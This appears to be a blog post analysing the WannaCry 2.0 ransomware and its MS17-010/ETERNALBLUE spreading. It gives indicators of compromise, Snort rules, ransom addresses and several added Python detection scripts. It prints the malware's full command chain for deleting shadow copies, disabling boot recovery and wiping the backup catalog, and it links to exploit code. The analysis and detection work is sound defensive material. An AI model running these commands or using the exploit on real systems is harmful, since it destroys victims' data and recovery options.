Graphical analysis of the WannaCry2.0 ransomware behind the "worldwide cyber ransomware attack"

I am an ordinary technical coder. If the analysis is not accurate, please point it out. The analysis of this software is for research from a security perspective only; please do not use it illegally. The tool will not be made public. Anyone interested is welcome to visit my blog (liberxue blog). Please do not reprint this article without attribution to liberxue.

Reference sources:

- https://gist.github.com/msuiche/691e52fd5f0d8b760080640687e23d60
- https://github.com/countercept/doublepulsar-detection-script/blob/master/detect_doublepulsar_smb.py

linberxue — WannaCry2.0 analysis

Supplement: the file encryption uses AES/RSA.

The packets and checks are very similar to those of the DOUBLEPULSAR detection tool referenced above, which was written from reverse engineering.

### About WannaCry exploiting MS17-010

The malware is being distributed using the MS17-010 vulnerability. This is an SMB vulnerability that allows remote code execution; details are in Microsoft Security Bulletin MS17-010 - Critical. Exploit code is available on several sites, including [MS17-010](https://github.com/RiskSense-Ops/MS17-010/blob/master/exploits/eternalblue/ms17_010_eternalblue.rb).

This exploit, also known as the Equation Group's ETERNALBLUE exploit, was part of the FuzzBunch toolkit released by the Shadow Brokers a few weeks ago.

With MS17-010, an attacker needs only one exploit to gain remote access with system privileges, which means two steps (remote code execution plus local privilege escalation) using only one bug in the SMB protocol. Analysis of the exploit code in Metasploit, the well-known penetration-testing framework, shows that the exploit uses 'KI_USER_SHARED_DATA', which has a fixed memory address (0xffdff000 on 32-bit Windows), so that the payload can later be copied there and control transferred to it.

Because the attacker gains control of a victim PC remotely, with system privileges and without any user action, taking control of one system inside a local network lets the malware spread to every other system in that network that is affected by the vulnerability. In this case the compromised system spreads ransomware, and every Windows system that has not patched MS17-010 is vulnerable.

### Working process

Volume shadow copies and backups are removed using the following command line:

```cmd
cmd /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
```
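As an added example (not part of the original post), the following Python shows how a defender can flag this backup-destruction chain in process-creation telemetry. The events are constructed in the style of a Sysmon process-creation record; the field names (`ProcessId`, `Image`, `CommandLine`), the indicator names and the helper functions are assumptions made for this example, and the scored command line is the one quoted above.

```python
"""
Added example, not from the original post: detection of the backup-destruction
command chain above in process-creation telemetry.  Events are constructed in
the style of a Sysmon Event ID 1 record; field and helper names are assumptions.
"""
import re

# One pattern per destructive action that appears in the command line above.
INDICATORS = {
    "vssadmin_delete_shadows": re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I),
    "wmic_shadowcopy_delete":  re.compile(r"\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b", re.I),
    "bcdedit_ignore_failures": re.compile(r"\bbcdedit(?:\.exe)?\b.*\bbootstatuspolicy\s+ignoreallfailures\b", re.I),
    "bcdedit_recovery_off":    re.compile(r"\bbcdedit(?:\.exe)?\b.*\brecoveryenabled\s+no\b", re.I),
    "wbadmin_delete_catalog":  re.compile(r"\bwbadmin(?:\.exe)?\s+delete\s+catalog\b", re.I),
}


def split_chain(command_line: str):
    """Split a cmd.exe chain on '&', '&&', '|' and '||' so each sub-command is scored alone."""
    return [part.strip() for part in re.split(r"&&|&|\|\||\|", command_line) if part.strip()]


def classify(command_line: str):
    """Return the sorted list of indicator names matched anywhere in the command line."""
    found = set()
    for part in split_chain(command_line):
        for name, rx in INDICATORS.items():
            if rx.search(part):
                found.add(name)
    return sorted(found)


def severity(names):
    """One vssadmin/bcdedit call can be legitimate admin work; two or more distinct
    backup-destruction actions together is the ransomware pattern."""
    if len(names) >= 2:
        return "high"
    if names:
        return "medium"
    return "none"


def triage(events):
    """events: list of dicts with 'ProcessId', 'Image', 'CommandLine'.
    Returns one finding per event that matched at least one indicator."""
    findings = []
    for ev in events:
        names = classify(ev["CommandLine"])
        if names:
            findings.append({"ProcessId": ev["ProcessId"], "Image": ev["Image"],
                             "indicators": names, "severity": severity(names)})
    return findings


# Constructed sample telemetry (not real logs).
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & "
                    r"bcdedit /set {default} bootstatuspolicy ignoreallfailures & "
                    r"bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet"},
    {"ProcessId": 2210, "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin list shadows"},                       # benign enumeration
    {"ProcessId": 3377, "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin delete shadows /for=D: /oldest"},     # single action, could be admin
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Splitting on the cmd.exe chain operators matters: on a real host the same five actions may also arrive as five separate child processes, each with its own short command line, so scoring has to work per action and be aggregated per parent process rather than expecting the whole chain in one event.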

The ransomware writes itself into a randomly named folder under "ProgramData" with the filename "tasksche.exe", or into the C:\Windows folder with the filenames "mssecsvc.exe" and "tasksche.exe".

Simple examples:

```text
C:\ProgramData\abc\tasksche.exe
C:\ProgramData\360\tasksche.exe
C:\ProgramData\wps\tasksche.exe
```

The shortcut is created by executing a batch (.bat) script.

Content of the batch file (fefe6b30d0819f1a1775e14730a10e0e):

```bat
@echo off
echo SET ow = WScript.CreateObject("WScript.Shell")> m.vbs
echo SET om = ow.CreateShortcut("C:\@WanaDecryptor@.exe.lnk")>> m.vbs
echo om.TargetPath = "C:\@WanaDecryptor@.exe">> m.vbs
echo om.Save>> m.vbs
cscript.exe //nologo m.vbs
del m.vbs
del /a %0
```

Content of 'm.vbs' (generated by the batch file above):

```vbscript
SET ow = WScript.CreateObject("WScript.Shell")
SET om = ow.CreateShortcut("C:\@WanaDecryptor@.exe.lnk")
om.TargetPath = "C:\@WanaDecryptor@.exe"
om.Save
```

SNORT rules:

```snort
alert smb any any -> $HOME_NET any (msg:"ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Request (set)"; flow:to_server,established; content:"|00 00 00 31 ff|SMB|2b 00 00 00 00 18 07 c0|"; depth:16; fast_pattern; content:"|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|"; distance:0; flowbits:set,ETPRO.ETERNALBLUE; flowbits:noalert; classtype:trojan-activity; sid:2024220; rev:1;)

alert smb $HOME_NET any -> any any (msg:"ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response"; flow:from_server,established; content:"|00 00 00 31 ff|SMB|2b 00 00 00 00 98 07 c0|"; depth:16; fast_pattern; content:"|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|"; distance:0; flowbits:isset,ETPRO.ETERNALBLUE; classtype:trojan-activity; sid:2024218; rev:1;)
```

SANS's Snort rule:

```snort
alert tcp $HOME_NET 445 -> any any (msg:"ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response"; flow:from_server,established; content:"|00 00 00 31 ff|SMB|2b 00 00 00 00 98 07 c0|"; depth:16; fast_pattern; content:"|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|"; distance:0; flowbits:isset,ETPRO.ETERNALBLUE; classtype:trojan-activity; sid:2024218; rev:2;)
```
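To make the matching logic of these rules concrete, here is an added example (not part of the original post, and not code from Emerging Threats or SANS) that re-implements in plain Python what the rules check: the 16-byte SMB echo header within the first 16 bytes of the payload (`depth:16`), the echo data "JlJmIhClBsr" somewhere after it (`distance:0`), and the flowbit that makes the response rule fire only after the request was seen. The byte patterns come from the rules above; the SMB echo messages, the function names and the `(direction, payload)` flow format are constructed for this example.

```python
"""
Added example, not from the original post or the ET/SANS rule sets: a plain-Python
emulation of the two ETERNALBLUE echo rules above, run over constructed SMB echo
packets so the matching logic can be exercised offline.
"""

# First 'content' of each rule (depth:16 -> must sit entirely inside the first 16 bytes).
ECHO_REQUEST_HDR = bytes.fromhex("00000031ff") + b"SMB" + bytes.fromhex("2b000000001807c0")
ECHO_RESPONSE_HDR = bytes.fromhex("00000031ff") + b"SMB" + bytes.fromhex("2b000000009807c0")
# Second 'content' of both rules (distance:0 -> anywhere after the end of the first match).
ECHO_DATA = bytes.fromhex("4a6c4a6d4968436c42737200")   # "JlJmIhClBsr\0"
DEPTH = 16

SID_RESPONSE = 2024218   # the alerting rule; sid 2024220 only sets the flowbit (noalert)


def match_contents(payload: bytes, header: bytes) -> bool:
    """Emulate 'content:<header>; depth:16; content:<ECHO_DATA>; distance:0;'."""
    idx = payload[:DEPTH].find(header)
    if idx < 0:
        return False
    return payload.find(ECHO_DATA, idx + len(header)) >= 0


def inspect_flow(packets):
    """packets: ordered list of (direction, payload) for one TCP flow.

    Returns the sids that would fire.  The request rule sets ETPRO.ETERNALBLUE and
    is noalert; the response rule alerts only when that bit is already set.
    """
    eternalblue_bit = False
    alerts = []
    for direction, payload in packets:
        if direction == "to_server" and match_contents(payload, ECHO_REQUEST_HDR):
            eternalblue_bit = True                       # flowbits:set + flowbits:noalert
        elif direction == "from_server" and match_contents(payload, ECHO_RESPONSE_HDR):
            if eternalblue_bit:                          # flowbits:isset
                alerts.append(SID_RESPONSE)
    return alerts


def build_echo(header: bytes, data: bytes) -> bytes:
    """Construct an SMBv1 Echo (command 0x2b) message starting with the given 16 bytes.

    After the 4-byte NetBIOS length: 32-byte SMB header, WordCount=1, EchoCount=1,
    ByteCount, data.  The header constant covers the first 12 SMB header bytes, so
    20 zero bytes complete the header.  The 0x31 (49) NetBIOS length in the rule is
    exactly the size of an echo carrying the 12-byte "JlJmIhClBsr\0" data.
    """
    return header + b"\x00" * 20 + b"\x01" + b"\x01\x00" + len(data).to_bytes(2, "little") + data


# Constructed sample flows (not captured traffic).
SAMPLE_EXPLOIT_FLOW = [
    ("to_server",   build_echo(ECHO_REQUEST_HDR, ECHO_DATA)),
    ("from_server", build_echo(ECHO_RESPONSE_HDR, ECHO_DATA)),
]
SAMPLE_BENIGN_FLOW = [                                    # same header bytes, other echo data
    ("to_server",   build_echo(ECHO_REQUEST_HDR, b"ordinary ping")),
    ("from_server", build_echo(ECHO_RESPONSE_HDR, b"ordinary ping")),
]
SAMPLE_RESPONSE_ONLY = [("from_server", build_echo(ECHO_RESPONSE_HDR, ECHO_DATA))]

if __name__ == "__main__":
    print(inspect_flow(SAMPLE_EXPLOIT_FLOW), inspect_flow(SAMPLE_BENIGN_FLOW),
          inspect_flow(SAMPLE_RESPONSE_ONLY))
```

Note that in both rule sets the request rule carries `flowbits:noalert`, so an echo request alone never alerts; only a response that matches after the request has been seen on the same flow does, which is what the `SAMPLE_RESPONSE_ONLY` case demonstrates.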

Files associated with Wana Decrypt0r/WanaCrypt0r:

[Installed_Folder]\00000000.eky
[Installed_Folder]\00000000.pky
[Installed_Folder]\00000000.res
[Installed_Folder]\@Please_Read_Me@.txt
[Installed_Folder]\@WanaDecryptor@.exe
[Installed_Folder]\b.wnry
[Installed_Folder]\c.wnry
[Installed_Folder]\f.wnry
[Installed_Folder]\msg\
[Installed_Folder]\msg\m_bulgarian.wnry
[Installed_Folder]\msg\m_chinese (simplified).wnry
[Installed_Folder]\msg\m_chinese (traditional).wnry
[Installed_Folder]\msg\m_croatian.wnry
[Installed_Folder]\msg\m_czech.wnry
[Installed_Folder]\msg\m_danish.wnry
[Installed_Folder]\msg\m_dutch.wnry
[Installed_Folder]\msg\m_english.wnry
[Installed_Folder]\msg\m_filipino.wnry
[Installed_Folder]\msg\m_finnish.wnry
[Installed_Folder]\msg\m_french.wnry
[Installed_Folder]\msg\m_german.wnry
[Installed_Folder]\msg\m_greek.wnry
[Installed_Folder]\msg\m_indonesian.wnry
[Installed_Folder]\msg\m_italian.wnry
[Installed_Folder]\msg\m_japanese.wnry
[Installed_Folder]\msg\m_korean.wnry
[Installed_Folder]\msg\m_latvian.wnry
[Installed_Folder]\msg\m_norwegian.wnry
[Installed_Folder]\msg\m_polish.wnry
[Installed_Folder]\msg\m_portuguese.wnry
[Installed_Folder]\msg\m_romanian.wnry
[Installed_Folder]\msg\m_russian.wnry
[Installed_Folder]\msg\m_slovak.wnry
[Installed_Folder]\msg\m_spanish.wnry
[Installed_Folder]\msg\m_swedish.wnry
[Installed_Folder]\msg\m_turkish.wnry
[Installed_Folder]\msg\m_vietnamese.wnry
[Installed_Folder]\r.wnry
[Installed_Folder]\s.wnry
[Installed_Folder]\t.wnry
[Installed_Folder]\TaskData\
[Installed_Folder]\TaskData\Data\
[Installed_Folder]\TaskData\Data\Tor\
[Installed_Folder]\TaskData\Tor\
[Installed_Folder]\TaskData\Tor\libeay32.dll
[Installed_Folder]\TaskData\Tor\libevent-2-0-5.dll
[Installed_Folder]\TaskData\Tor\libevent_core-2-0-5.dll
[Installed_Folder]\TaskData\Tor\libevent_extra-2-0-5.dll
[Installed_Folder]\TaskData\Tor\libgcc_s_sjlj-1.dll
[Installed_Folder]\TaskData\Tor\libssp-0.dll
[Installed_Folder]\TaskData\Tor\ssleay32.dll
[Installed_Folder]\TaskData\Tor\taskhsvc.exe
[Installed_Folder]\TaskData\Tor\tor.exe
[Installed_Folder]\TaskData\Tor\zlib1.dll
[Installed_Folder]\taskdl.exe
[Installed_Folder]\taskse.exe
[Installed_Folder]\u.wnry
[Installed_Folder]\wcry.exe

Registry keys associated with Wana Decrypt0r/WanaCrypt0r:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\[random]	"[Installed_Folder]\tasksche.exe"
HKCU\Software\WanaCrypt0r\
HKCU\Software\WanaCrypt0r\wd	[Installed_Folder]
HKCU\Control Panel\Desktop\Wallpaper	"[Installed_Folder]\Desktop\@WanaDecryptor@.bmp"
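As an added example (not part of the original post), the following Python performs a host-side sweep for the file and registry indicators listed above, run over a constructed host snapshot. The snapshot contents, the helper names and the finding labels are assumptions for this example; on a real host the inputs would come from a directory walk and a registry export, which this code deliberately does not perform.

```python
"""
Added example, not from the original post: a sweep over a constructed host snapshot
for the file and registry indicators listed above.  Snapshot contents and helper
names are assumptions for this example.
"""
import fnmatch
import ntpath

# File-name patterns from the indicator list above.  Only the file name is matched,
# case-insensitively, because [Installed_Folder] is a random directory name.
FILE_NAME_PATTERNS = [
    "00000000.eky", "00000000.pky", "00000000.res",
    "@wanadecryptor@.exe", "*.wnry",
    "taskdl.exe", "taskse.exe", "tasksche.exe", "wcry.exe", "taskhsvc.exe",
]

# Registry indicators from the list above (compared in lower case).
WANACRYPT0R_KEY = r"hkcu\software\wanacrypt0r"
RUN_KEY = r"hkcu\software\microsoft\windows\currentversion\run"
WALLPAPER_VALUE = r"hkcu\control panel\desktop\wallpaper"


def check_files(paths):
    """Return [(path, pattern)] for every path whose file name matches an indicator."""
    hits = []
    for path in paths:
        name = ntpath.basename(path).lower()     # ntpath handles backslashes on any OS
        for pattern in FILE_NAME_PATTERNS:
            if fnmatch.fnmatchcase(name, pattern):
                hits.append((path, pattern))
                break
    return hits


def check_registry(values):
    r"""values maps 'HIVE\Key\ValueName' -> data.  Return [(value_path, reason)]."""
    hits = []
    for value_path, data in values.items():
        key = value_path.lower()
        data_l = str(data).lower().strip('"')    # Run values are usually quoted
        if key.startswith(WANACRYPT0R_KEY):
            hits.append((value_path, "WanaCrypt0r registry key present"))
        elif key.startswith(RUN_KEY) and data_l.endswith(r"\tasksche.exe"):
            hits.append((value_path, "Run persistence pointing at tasksche.exe"))
        elif key == WALLPAPER_VALUE and "@wanadecryptor@" in data_l:
            hits.append((value_path, "wallpaper replaced by ransom image"))
    return hits


def sweep(paths, values):
    """Combine both checks; any single indicator is enough for an 'infected' verdict."""
    files = check_files(paths)
    regs = check_registry(values)
    return {"files": files, "registry": regs,
            "verdict": "infected" if (files or regs) else "clean"}


# Constructed snapshots (not taken from a real machine); 'abc' is the page's own example folder.
INFECTED_FILES = [
    r"C:\ProgramData\abc\tasksche.exe",
    r"C:\ProgramData\abc\00000000.eky",
    r"C:\ProgramData\abc\msg\m_english.wnry",
    r"C:\ProgramData\abc\TaskData\Tor\taskhsvc.exe",
    r"C:\Windows\System32\notepad.exe",
]
INFECTED_REGISTRY = {
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\qkwezxcv": r'"C:\ProgramData\abc\tasksche.exe"',
    r"HKCU\Software\WanaCrypt0r\wd": r"C:\ProgramData\abc",
    r"HKCU\Control Panel\Desktop\Wallpaper": r'"C:\ProgramData\abc\Desktop\@WanaDecryptor@.bmp"',
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive":
        r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
}
CLEAN_FILES = [r"C:\Windows\System32\notepad.exe", r"C:\Users\alice\Documents\report.docx"]
CLEAN_REGISTRY = {
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive":
        r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
}

if __name__ == "__main__":
    print(sweep(INFECTED_FILES, INFECTED_REGISTRY))
    print(sweep(CLEAN_FILES, CLEAN_REGISTRY))
```

Matching on file names rather than full paths is deliberate: the indicator list only fixes the names, and the install directory is random, so a full-path match would miss every real infection.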

Network communication of Wana Decrypt0r/WanaCrypt0r:

gx7ekbenv2riucmf.onion
57g7spgrzlojinas.onion
xxlvbrloxvriy2c5.onion
76jdd2ir2embyv47.onion
cwwnhwhlz52maqm7.onion
https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip

The Tor endpoint addresses recovered from the configuration file:

gx7ekbenv2riucmf.onion
57g7spgrzlojinas.onion
xxlvbrloxvriy2c5.onion
76jdd2ir2embyv47.onion
cwwnhwhlz52maqm7.onion
The software also downloads version 0.2.9.10 of the Tor browser: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip

The Ransomware grants full access to all files by using the following command:

The file size of the ransomware is 3.4 MB (3514368 bytes)

The dropper extracts the password-protected archive containing the ransomware (password "WNcry@2ol7") from its resources (XIA/2058).

### Payment addresses

The ransomware receives payments at 3 different Bitcoin addresses:


115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

If you are interested, you can look up how much has been paid to each of these addresses on a blockchain explorer.

### Diagram

![Analysis of the ransom]

- msg - this folder contains RTF files with the ransomware's instructions in different languages, 28 languages in total.
- b.wnry - BMP image used by the malware as the replacement desktop background.
- c.wnry - configuration file containing the target addresses, including the Tor communication endpoint information.
- s.wnry - Tor client that communicates with the endpoints above.
- u.wnry - the ransomware's UI, containing the communication routines and the password validation (still under analysis).
- t.wnry - the "WANACRY!" file - contains the default key.

WannaCry2.0 screenshots

- r.wnry - Q&A file containing the payment instructions, used by the application (taskdl.exe / taskse.exe). (Image: payment instructions)

### Encryption process

Below is the list of 179 file types encrypted by the ransomware.


- “.doc” 
- “.docx” 
- “.docb” 
- “.docm” 
- “.dot” 
- “.dotm” 
- “.dotx” 
- “.xls” 
- “.xlsx” 
- “.xlsm” 
- “.xlsb” 
- “.xlw” 
- “.xlt” 
- “.xlm” 
- “.xlc” 
- “.xltx” 
- “.xltm” 
- “.ppt” 
- “.pptx” 
- “.pptm” 
- “.pot” 
- “.pps” 
- “.ppsm” 
- “.ppsx” 
- “.ppam” 
- “.potx” 
- “.potm” 
- “.pst”
- “.ost” 
- “.msg” 
- “.eml” 
- “.edb” 
- “.vsd” 
- “.vsdx” 
- “.txt” 
- “.csv” 
- “.rtf” 
- “.123” 
- “.wks” 
- “.wk1” 
- “.pdf” 
- “.dwg” 
- “.onetoc2” 
- “.snt” 
- “.hwp” 
- “.602” 
- “.sxi” 
- “.sti” 
- “.sldx” 
- “.sldm” 
- “.sldm” 
- “.vdi” 
- “.vmdk” 
- “.vmx” 
- “.gpg” 
- “.aes”
- “.ARC” 
- “.PAQ” 
- “.bz2” 
- “.tbk” 
- “.bak” 
- “.tar” 
- “.tgz” 
- “.gz” 
- “.7z” 
- “.rar” 
- “.zip” 
- “.backup” 
- “.iso” 
- “.vcd” 
- “.jpeg” 
- “.jpg” 
- “.bmp” 
- “.png” 
- “.gif” 
- “.raw” 
- “.cgm” 
- “.tif” 
- “.tiff” 
- “.nef” 
- “.psd” 
- “.ai” 
- “.svg” 
- “.djvu”
- “.m4u” 
- “.m3u” 
- “.mid” 
- “.wma” 
- “.flv” 
- “.3g2” 
- “.mkv” 
- “.3gp” 
- “.mp4” 
- “.mov” 
- “.avi” 
- “.asf” 
- “.mpeg” 
- “.vob” 
- “.mpg” 
- “.wmv” 
- “.fla” 
- “.swf” 
- “.wav” 
- “.mp3” 
- “.sh” 
- “.class” 
- “.jar” 
- “.java” 
- “.rb” 
- “.asp” 
- “.php” 
- “.jsp”
- “.brd” 
- “.sch” 
- “.dch” 
- “.dip” 
- “.pl” 
- “.vb” 
- “.vbs” 
- “.ps1” 
- “.bat” 
- “.cmd” 
- “.js” 
- “.asm” 
- “.h” 
- “.pas” 
- “.cpp” 
- “.c” 
- “.cs” 
- “.suo” 
- “.sln” 
- “.ldf” 
- “.mdf” 
- “.ibd” 
- “.myi” 
- “.myd” 
- “.frm” 
- “.odb” 
- “.dbf” 
- “.db”
- “.mdb” 
- “.accdb” 
- “.sql” 
- “.sqlitedb” 
- “.sqlite3” 
- “.asc” 
- “.lay6” 
- “.lay” 
- “.mml” 
- “.sxm” 
- “.otg” 
- “.odg” 
- “.uop” 
- “.std” 
- “.sxd” 
- “.otp” 
- “.odp” 
- “.wb2” 
- “.slk” 
- “.dif” 
- “.stc” 
- “.sxc” 
- “.ots” 
- “.ods” 
- “.3dm” 
- “.max” 
- “.3ds”
- “.uot” 
- “.stw” 
- “.sxw” 
- “.ott” 
- “.odt” 
- “.pem” 
- “.p12” 
- “.csr” 
- “.crt” 
- “.key” 
- “.pfx” 
- “.der”


Origin http://43.154.161.224:23101/article/api/json?id=324375789&siteId=291194637